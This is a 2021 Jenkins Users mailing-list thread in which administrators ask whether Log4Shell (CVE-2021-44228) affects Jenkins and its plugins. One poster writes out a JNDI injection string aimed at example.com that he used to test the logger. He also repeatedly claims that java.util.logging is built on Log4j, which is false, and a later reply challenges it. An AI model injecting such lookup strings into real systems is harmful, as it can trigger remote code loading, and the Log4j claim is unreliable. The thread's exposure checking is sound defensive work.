[Urgent] CVE-2021-44228 and Jenkins

152 views
Skip to first unread message

the.n...@gmail.com

unread,
Dec 12, 2021, 10:27:40 AM12/12/21
to Jenkins Users
Hi All,

I am looking for any information relating to whether the Zero Days CVE has any impact on Jenkins or Plugins. We do know that the java.util.logging is built on log4j, but do not know whether protections are in place to prevent this vulnerability from being exploited, and where. For example, could a command in a pipeline trigger this vulnerability.

This is a somewhat urgent request.

Thanks,
Randall

Krish S

unread,
Dec 12, 2021, 11:34:15 AM12/12/21
to jenkins...@googlegroups.com
I am following for the same issue… found below info on community page regarding this vulnerability. 


Thanks & Regards, 
Kritesh

--
You received this message because you are subscribed to the Google Groups "Jenkins Users" group.
To unsubscribe from this group and stop receiving emails from it, send an email to jenkinsci-use...@googlegroups.com.
To view this discussion on the web visit https://groups.google.com/d/msgid/jenkinsci-users/4e157a13-bfba-425a-81ae-b93cdd845f9dn%40googlegroups.com.

the.n...@gmail.com

unread,
Dec 12, 2021, 11:39:55 AM12/12/21
to Jenkins Users
Hi Kritesh,

Thank you for this info.

The problem with that example is that Apache java.util.logging is built on top of Log4j but does not identify as such. I am not convinced that this test is sufficient.

Sincerely,
Randall

the.n...@gmail.com

unread,
Dec 12, 2021, 11:44:35 AM12/12/21
to Jenkins Users
Running the script:
println(java.util.logging.Logger.class)

does indicated that Apache logger (built on top of Log4j) is present in the LTS version of Jenkins.

the.n...@gmail.com

unread,
Dec 12, 2021, 12:28:09 PM12/12/21
to Jenkins Users
The good news is that passing the ${jndi:ldap://example.com/a} string through the logger does not trigger the CVE behaviour.

the.n...@gmail.com

unread,
Dec 12, 2021, 5:12:46 PM12/12/21
to Jenkins Users
Good discussion here: https://issues.jenkins.io/browse/JENKINS-67353

Baptiste Mathus

unread,
Dec 29, 2021, 2:20:17 AM12/29/21
to jenkins...@googlegroups.com


Le dim. 12 déc. 2021 à 16:27, the.n...@gmail.com <the.n...@gmail.com> a écrit :
Hi All,

I am looking for any information relating to whether the Zero Days CVE has any impact on Jenkins or Plugins. We do know that the java.util.logging is built on log4j,

Where did you read that java.util.logging is built on log4j?

but do not know whether protections are in place to prevent this vulnerability from being exploited, and where. For example, could a command in a pipeline trigger this vulnerability.

This is a somewhat urgent request.

Thanks,
Randall

--
Reply all
Reply to author
Forward
0 new messages